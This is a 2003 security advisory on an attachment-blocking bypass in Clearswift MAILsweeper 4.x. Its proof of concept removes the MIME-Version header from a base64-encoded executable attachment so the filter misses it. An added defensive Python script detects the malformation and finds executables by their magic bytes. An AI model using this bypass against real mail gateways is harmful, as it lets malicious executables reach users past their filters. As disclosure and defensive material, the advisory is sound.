Reported March 3, 2003, by Martin O’Neal.
VERSIONS AFFECTED
  • Clearswift MAILsweeper 4.x for Windows NT/2000
DESCRIPTION
A vulnerability exists in Clearswift's MAILsweeper 4.x that could result in the bypass of the attachment blocking feature on the vulnerable server. If a deliberately malformed MIME encapsulation technique is used, the MAILsweeper product will not recognize the attachment and will allow it to pass.
DEMONSTRATION
The discoverer posted the following steps as proof of concept:
-- Proof of concept --
 

For this proof of concept, the MIME encapsulation is simply modified to 
remove the MIME-Version header field. An example of an application that 
will process a MIME construct that is malformed in this way is Microsoft Internet Explorer.
 

Whilst RFC2045 states that all agents must include this field [2] it 
then goes on to say that "In the absence of a MIME-Version field, a 
receiving mail user agent (whether conforming to MIME requirements or 
not) may optionally choose to interpret the body of the message 
according to local conventions."
 

Step 1: On the MAILsweeper host create a new Data Type Manager with only the Executable type selected. Save and restart the MAILsweeper Security service.
 

Step 2: Now create a text file that will be used to hold the MIME 
encoded attachment. Start notepad (or another text editor), and paste 
in:
 

     MIME-Version: 1.0
     Content-Location:file:///executable.exe
     Content-Transfer-Encoding: base64
 

     TVp0AQIAAAAgAAgA//8YAIAAAAAQAAIAHgAAAAEAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAC4AQCO2I0WAgC0Cc0huCBMzSFFeGUhJCQJALH/
     /////wAAAAAAAFQBAAAAAAIAUkKL6IzABRAADh+jBAADB
     gwAjsCLDgYAi/lPi/f986RQuDQAUMuMw4zYSI7YjsC/Dw
     C5EACw//OuR4v3i8NIjsC/DwCxBIvG99DT6IzaK9BzBIz
     YK9LT4APwjtqLx/fQ0+iMwivQcwSMwCvS0+AD+I7CrIrQ
     Tq2LyEaKwiT+PLB1BazzqusGPLJ1bfOkisKoAXSxvjIBD
     h+LHgQA/DPSrYvI4xOLwgPDjsCti/iD//90ESYBHeLzgf
     oA8HQWgcIAEOvcjMBAjsCD7xAmAR1IjsDr4ovDiz4IAIs
     2CgAD8AEGAgAtEACO2I7AuwAA+o7Wi+f7i8Uu/y+0QLsC
     ALkWAIzKjtq6HAHNIbj/TM0hUGFja2VkIGZpbGUgaXMgY
     29ycnVwdAEAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAA=
 

Step 3: To reproduce this issue, send an email containing the attachment created in step 2 that will be processed by the scenario from step 1. This should result in a successful discovery condition. 
 

Step 4: Reopen the attachment from step 2 and remove the first line 
(MIME-Version: 1.0), then resend the attachment as per step 3. This 
should result in the attachment not being spotted as an executable.
VENDOR RESPONSE
The vendor, Clearswift, has made an updated script utility available that can detect the malformed MIME header used in this vulnerability. As a workaround, this should be implemented until a fix or patch is available.
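The vendor's detection script is not reproduced on the page. The Python script below is an added example written for this page, not Clearswift's utility and not the discoverer's code. It implements the two checks a mail gateway operator would want after reading the proof of concept and the vendor response: flag a message that carries MIME body headers (Content-Type, Content-Transfer-Encoding, Content-Location, Content-Disposition) without a MIME-Version header, and identify an executable by its leading bytes after base64-decoding the body, whether or not the MIME parser turned that body into an attachment. The three sample messages are constructed (the "executable" is just an MZ signature followed by filler bytes, not a program), and the header list and magic-byte table are assumptions chosen for the example rather than values taken from the advisory.

```python
"""Defensive checks for the malformation described in the advisory.

Constructed example, not Clearswift's script utility: a message that carries
MIME body headers but omits MIME-Version is flagged, and executable content is
detected by magic bytes independently of whether the encapsulation was parsed.
"""
import base64
import binascii
import email
import re
from email import policy
from email.message import Message

# Header names that only make sense in a MIME message (assumed list).
MIME_BODY_HEADERS = ("content-type", "content-transfer-encoding",
                     "content-disposition", "content-location")

# Leading bytes of executable formats to block (assumed: DOS/PE 'MZ', ELF).
EXECUTABLE_MAGIC = (b"MZ", b"\x7fELF")

# A run of base64 text: 4-character groups, possibly split across lines,
# with an optional padded tail. At least 10 groups to keep noise down.
_B64_RUN = re.compile(rb"(?:[A-Za-z0-9+/]{4}\s*){10,}(?:[A-Za-z0-9+/]{2,3}=*)?")


def missing_mime_version(msg: Message) -> bool:
    """True when MIME-only headers appear without a MIME-Version header."""
    if msg.get("MIME-Version") is not None:
        return False
    return any(msg.get(name) is not None for name in MIME_BODY_HEADERS)


def _is_executable(data: bytes) -> bool:
    return data.startswith(EXECUTABLE_MAGIC)


def scan_message(raw: bytes) -> dict:
    """Return a verdict dict for one raw RFC 822 message given as bytes."""
    msg = email.message_from_bytes(raw, policy=policy.compat32)
    no_version = missing_mime_version(msg)

    # Pass 1: whatever the MIME parser was able to turn into parts.
    parsed_hits = 0
    for part in msg.walk():
        if part.is_multipart():
            continue
        if _is_executable(part.get_payload(decode=True) or b""):
            parsed_hits += 1

    # Pass 2: raw scan of the body for base64 runs, independent of how (or
    # whether) the parser structured the message.
    body = re.split(rb"\r?\n\r?\n", raw, maxsplit=1)[-1]
    raw_hits = 0
    for run in _B64_RUN.finditer(body):
        try:
            data = base64.b64decode(re.sub(rb"\s+", b"", run.group(0)), validate=True)
        except binascii.Error:
            continue
        if _is_executable(data):
            raw_hits += 1

    return {
        "missing_mime_version": no_version,
        "executable_parts": parsed_hits,
        "executable_raw_runs": raw_hits,
        "block": no_version or parsed_hits > 0 or raw_hits > 0,
    }


def _wrap(text: str, width: int = 45) -> str:
    return "\r\n".join(text[i:i + width] for i in range(0, len(text), width))


# Constructed sample payload: an 'MZ' header followed by filler bytes. It is
# NOT a real program; it only has to satisfy the magic-byte check.
FAKE_EXE_B64 = _wrap(base64.b64encode(b"MZ" + b"\x90" * 60).decode())

# Well-formed MIME attachment (constructed).
WELL_FORMED = (
    "MIME-Version: 1.0\r\n"
    "Content-Type: application/octet-stream; name=\"tool.exe\"\r\n"
    "Content-Transfer-Encoding: base64\r\n"
    "\r\n" + FAKE_EXE_B64 + "\r\n"
).encode()

# The advisory's variant: same body, MIME-Version line removed (constructed).
MALFORMED = (
    "Content-Location: file:///executable.exe\r\n"
    "Content-Transfer-Encoding: base64\r\n"
    "\r\n" + FAKE_EXE_B64 + "\r\n"
).encode()

# A benign text message for comparison (constructed).
BENIGN = (
    "MIME-Version: 1.0\r\n"
    "Content-Type: text/plain\r\n"
    "\r\n"
    "Quarterly numbers attached separately.\r\n"
).encode()


if __name__ == "__main__":
    for label, raw in (("well-formed", WELL_FORMED), ("malformed", MALFORMED),
                       ("benign", BENIGN)):
        print(label, scan_message(raw))
```

Running the script prints a verdict for each sample; the malformed message is blocked on both counts, the well-formed one on content alone, and the benign one passes. The point of the second pass is that the data-type decision should not depend on the encapsulation being recognised, which is exactly the gap the proof of concept exercises. In a gateway the raw scan would run per decoded transport unit rather than over the whole message, and the verdict would feed the existing policy rather than replace it.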

CREDIT


Discovered by Martin O'Neal.